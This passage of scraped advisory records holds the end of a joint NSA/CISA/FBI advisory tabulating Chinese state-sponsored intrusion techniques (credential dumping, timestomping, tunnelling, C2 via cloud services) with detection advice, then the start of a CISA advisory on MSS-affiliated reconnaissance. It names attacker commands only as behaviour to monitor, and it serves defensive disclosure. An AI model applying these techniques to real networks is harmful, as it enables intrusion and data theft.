used.\n * Monitor the file system and shell commands for hidden attribute usage.\n| \n\nDetect: \n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nIndicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands. \nSeveral files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.\n\n| \n\n * Make the environment variables associated with command history read only to ensure that the history is preserved.\n * Recognize timestomping by monitoring the contents of important directories and the attributes of the files. \n * Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.\n * Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.\n * Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]\n\n| \n\nChinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.\n\n| \n\nConsider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.\n\n| \n\nDetect:\n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nSigned Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]\n\n * `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]\n\n * `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using Microsoft signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.\n\n| \n\nMonitor processes for the execution of known proxy binaries (e.g., r`undll32.exe`) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.\n\n| \n\nDetect:\n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]\n\n_Table VIII: Chinese state-sponsored cyber actors\u2019 Credential Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.\n\n| \n\n * Update and patch software regularly.\n\n * Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.\n\n| \n\nHarden: \n\n * Platform Hardening\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)] \n \nOS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)] \n\u2022 LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)] \n\u2022 NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]\n\n| \n\nChinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (`NDST.DIT)` for credential dumping.\n\n| \n\n * Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the `NDST.DIT`.\n\n * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.\n\n * Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.\n\n * Consider disabling or restricting NTLM. \n\n * Consider disabling `WDigest` authentication. \n\n * Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).\n\n * Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and requires hardware and firmware system requirements. \n\n * Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.\n\n| \n\nHarden:\n\n * Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\nIsolate: \n\n * Execution Isolation\n\n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]\n\n_Table IX: Chinese state-sponsored cyber actors\u2019 Discovery TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.\n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.\n\n| \n\nDetect: \n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]\n\n * Process Analysis \n\n * Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \nPermission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network. \n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.\n\n| \n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. \n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nNetwork Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.\n\n| \n\n\u2022 Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation. \n\u2022 Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`. \n\u2022 Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nRemote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including `ping`, `net group`, and `net user` to enumerate target network information.\n\n| \n\nMonitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]\n\n_Table X: Chinese state-sponsored cyber actors\u2019 Lateral Movement TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n * Disable or remove unnecessary services.\n\n * Minimize permissions and access for service accounts.\n\n * Perform vulnerability scanning and update software regularly.\n\n * Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)] \n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]\n\n_Table XI: Chinese state-sponsored cyber actors\u2019 Collection TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nArchive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]\n\n| \n\nChinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.\n\n| \n\n * Scan systems to identify unauthorized archival utilities or methods unusual for the environment.\n\n * Monitor command-line arguments for known archival utilities that are not common in the organization's environment.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nClipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]\n\n| \n\nChinese state-sponsored cyber actors used RDP and execute `rdpclip.exe` to exfiltrate information from the clipboard.\n\n| \n\n * Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through command line).\n\n * If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.\n\n| \n\nDetect:\n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nData Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `mv` command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.\n\n| \n\nProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\n| \n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nEmail Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `New-MailboxExportReques`t PowerShell cmdlet to export target email boxes.\n\n| \n\n * Audit email auto-forwarding rules for suspicious or unrecognized rulesets.\n\n * Encrypt email using public key cryptography, where feasible.\n\n * Use MFA on public-facing mail servers.\n\n| \n\nHarden:\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\n * Message Hardening\n\n * Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]\n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)] \n \n### Tactics: _Command and Control _[[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]\n\n_Table XII: Chinese state-sponsored cyber actors\u2019 Command and Control TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques \n| Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nApplication Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using commercial cloud storage services for command and control.\n\n * Using malware implants that use the Dropbox\u00ae API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive\u00ae API.\n\n| \n\nUse network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]\n\nIsolate: \n\n * Network Isolation\n\n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.\n\n| \n\n * Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. \n\n * Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.\n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.\n\n| \n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. \n\n| \n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.\n\n * Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.\n\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nProtocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity. \n\n| \n\n * Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.\n\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.\n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) \n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)] \n \nProxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]: \n\n * Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.\n\n| \n\nMonitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.\n\n * Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\n\n * Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\n * Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Appendix B: MITRE ATT&amp;CK Framework \n\n\n\n_Figure 2: MITRE ATT&amp;CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\nFor NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov.](<mailto:Cybersecurity_Requests@nsa.gov>)\n\nMedia Inquiries / Press Desk: \n\u2022 NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>) \n\u2022 CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>) \n\u2022 FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### References\n\n[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)\n\n### Revisions\n\nJuly 19, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Chinese State-Sponsored Cyber Operations: Observed TTPs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2021-08-20T12:00:00", "id": "AA21-200B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:34:20", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) and Pre-ATT&amp;CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).\n\n### Key Takeaways\n\n * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.\n * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.\n * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.\n * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.\n * This Advisory identifies some of the more common\u2014yet most effective\u2014TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nThrough the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People\u2019s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.\n\n### MITRE PRE-ATT&amp;CK\u00ae Framework for Analysis\n\nIn the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&amp;CK\u00ae Framework TTPs.\n\n#### Target Selection and Technical Information Gathering\n\n_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors\u2019 motivations and intents are often unknown, they often make their selections based on the target network\u2019s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]\n\n * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.\n * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.\n\nThese information sources have legitimate uses for network defense. CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.\n\nWhile using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.\n\nCISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).\n\n_Table 1: Technical information gathering techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>)\n\n| \n\nDetermine Approach/Attack Vector\n\n| \n\nThe threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. \n \n[T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>)\n\n| \n\nAcquire Open Source Intelligence (OSINT) Data Sets and Information\n\n| \n\nCISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. \n \n[T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>)\n\n| \n\nConduct Active Scanning\n\n| \n\nCISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. \n \n#### Technical Weakness Identification\n\nCISA analysts consistently observe targeting, scanning, 